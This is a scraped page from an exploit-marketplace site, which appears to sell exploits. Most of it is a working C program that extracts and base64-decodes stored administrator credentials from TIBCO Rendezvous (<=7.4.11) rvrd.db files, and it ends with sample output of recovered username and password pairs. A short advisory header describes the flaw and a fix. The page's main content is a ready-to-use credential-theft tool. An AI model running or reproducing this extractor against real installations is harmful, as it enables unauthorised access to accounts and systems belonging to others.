0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit
[===========================================================
TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit
===========================================================
/*
Exploit: TIBCO RendezVous local password extractor version <=7.4.11
Affected products: Tibco RendezOVous version <=7.4.11
Author: Andres Tarasco Acu?a (atarasco @ sia.es)
Advisory: http://www.514.es
Status: Vendor notifification
Timeline:
----------------
Discovered: who cares?
Exploit coded: xxxxxxxxxxx
Vendor Notified: xxxxxxxxx
Vendor patch: xxxxxxxxxxxx
Public Disclosure: xxxxxxx
Description:
Tibco products stores login and passwords in base64 without crypting them. Password
file is also accesible for everyone (at least under win32 enviroment).
Fix: Add restrictive ACLS to avoid data leak
D:\Programaci?n\tibco>tibco.exe c:\rvrd.db
Tibco RendezVous Password Dumper
Affected versions <=v7.4.11
Author: Andres Tarasco ( atarasco @ sia.es)
Url: http://www.514.es
[+] Tibco Logfile Opened (44068 bytes)
[+] Password Found at offset: 0xe53 (29 bytes)
Base64: QWRtaW5pc3RyYXRvcjpBQUFBQUE=
Decoded: Administrator:AAAAAA
[+] Password Found at offset: 0xe8a (17 bytes)
Base64: QWRtaW46ZnV4b3I=
Decoded: Admin:fuxor
[+] Password Found at offset: 0x104b (17 bytes)
Base64: YWRtaW46dGVzdA==
Decoded: admin:test
[+] Password Found at offset: 0x108a (17 bytes)
Base64: QWRtaW46ZnV4b3I=
Decoded: Admin:fuxor
[+] Password Found at offset: 0x10b5 (17 bytes)
Base64: YWRtaW46bWFzdGVy
Decoded: admin:master
*/
#include <stdio.h>
#include <windows.h>
#define DECODE64(c) (isascii(c) ? base64val[c] : -1)
static const char base64val[] = {
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
-1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
-1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1
};
int Base64Decode( char* out, const char* in, unsigned long size )
{
int len = 0;
register unsigned char digit1, digit2, digit3, digit4;
if (in[0] == '+' && in[1] == ' ')
in += 2;
if (*in == '\r')
return(0);
do {
digit1 = in[0];
if (DECODE64(digit1) == -1)
return(-1);
digit2 = in[1];
if (DECODE64(digit2) == -1)
return(-1);
digit3 = in[2];
if (digit3 != '=' && DECODE64(digit3) == -1)
return(-1);
digit4 = in[3];
if (digit4 != '=' && DECODE64(digit4) == -1)
return(-1);
in += 4;
*out++ = (DECODE64(digit1) << 2) | (DECODE64(digit2) >> 4);
++len;
if (digit3 != '=')
{
*out++ = ((DECODE64(digit2) << 4) & 0xf0) | (DECODE64(digit3) >> 2);
++len;
if (digit4 != '=')
{
*out++ = ((DECODE64(digit3) << 6) & 0xc0) | DECODE64(digit4);
++len;
}
}
} while (*in && *in != '\r' && digit4 != '=');
return (len);
}
/******************************************************************************/
void main (int argc,char *argv[]) {
DWORD size,i,read;
int port;
char *buffer,l,j,a;
char base64pass[0xff],pass[0xff];
unsigned char data[9] = {0x73, 0x65, 0x72, 0x70, 0x61, 0x73, 0x73, 0x00, 0x08};
HANDLE f;
int total=0;
printf("Tibco RendezVous Password Dumper\n");
printf("Author: Andres Tarasco ( atarasco @ sia.es)\n");
printf("Url: http://www.514.es\n\n");
if (argc!=2) {
printf("Usage: Tibco.exe c:\\rvrd.db\n\n");
exit(1);
}
f=CreateFile(argv[1],GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE , NULL, OPEN_EXISTING, 0, NULL);
if (f!=INVALID_HANDLE_VALUE) {
size=GetFileSize(f,NULL);
if (size>0) {
printf("[+] Tibco Logfile Opened (%i bytes)\n",size);
buffer=(char *)malloc(size);
ReadFile(f, &buffer[0], size, &read, NULL);
for(i=0;i<size-sizeof(data);i++) {
if (memcmp(&buffer[i],&data[0],sizeof(data))==0) {
total++;
l=buffer[i+sizeof(data)];
printf("[+] Password Found at offset: 0x%x (%i bytes)\n",i,l);
memset(base64pass,'\0',sizeof(pass));
memcpy(&base64pass[0],&buffer[i+sizeof(data)+1],l);
printf(" Base64: %s\n",base64pass);
j=Base64Decode( pass, base64pass, l );
pass[j]='\0';
printf(" Decoded: %s\n\n",pass);
}
}
if (total==0) {
printf("[+] Password not set: Administrator / NULL\n");
}
}
} else {
printf("[-] UNABLE TO %s\n",argv[1]);
}
return(total);
}
# 0day.today [2024-11-15] #